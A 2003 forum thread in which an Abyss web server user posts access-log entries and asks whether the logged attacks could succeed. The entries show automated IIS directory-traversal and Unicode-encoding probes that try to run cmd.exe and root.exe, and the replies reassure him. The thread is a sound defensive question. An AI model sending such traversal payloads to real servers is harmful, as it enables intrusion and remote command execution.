View previous topic :: View next topic |
Author |
Message |
mekp21 -
Joined: 27 Mar 2003 Posts: 2
|
Posted: Tue Apr 22, 2003 11:10 pm Post subject: Hacking Abyss server |
|
|
I have had abyss running for the past week and love it. But checking ther access log reveals something odd
24.205.10.212 - - [21/Apr/2003:21:49:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:21:49:39 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:46 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:47 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:48 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.205.10.212 - - [21/Apr/2003:22:06:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
68.36.130.141 - - [22/Apr/2003:01:00:08 +1133] "OPTIONS / HTTP/1.1" 200 259
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:04 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:08 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:14 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
24.93.117.108 - - [22/Apr/2003:01:01:18 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:21 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:25 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:26 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:29 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108 - - [22/Apr/2003:01:01:36 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268
24.93.117.108
is just a sample of the log. It seems to happen every night around the same time and I realize the 400 or the 404 at the end of the line means they didnt get through but what are the chances that they will eventually?
Jason |
|
Back to top |
|
|
feamsr00 -
Joined: 04 Jun 2002 Posts: 138 Location: Phila PA
|
Posted: Tue Apr 22, 2003 11:31 pm Post subject: |
|
|
It means absoloutly nothng to you. As long as you run abyss, you are not affected. |
|
Back to top |
|
|
WhiteDevil -
Joined: 07 Oct 2002 Posts: 74 Location: United Kingdom
|
Posted: Wed Apr 23, 2003 9:06 am Post subject: |
|
|
everywhere you are getting the number 404 come up it means that the person requesting items from your server was denied them...
Error 400 means Bad Request so the "hacker" still didnt get what they were after...
if you ever get error 200, 201 or 202 then post here, because someone has found a major security risk... _________________
|
|
Back to top |
|
|
|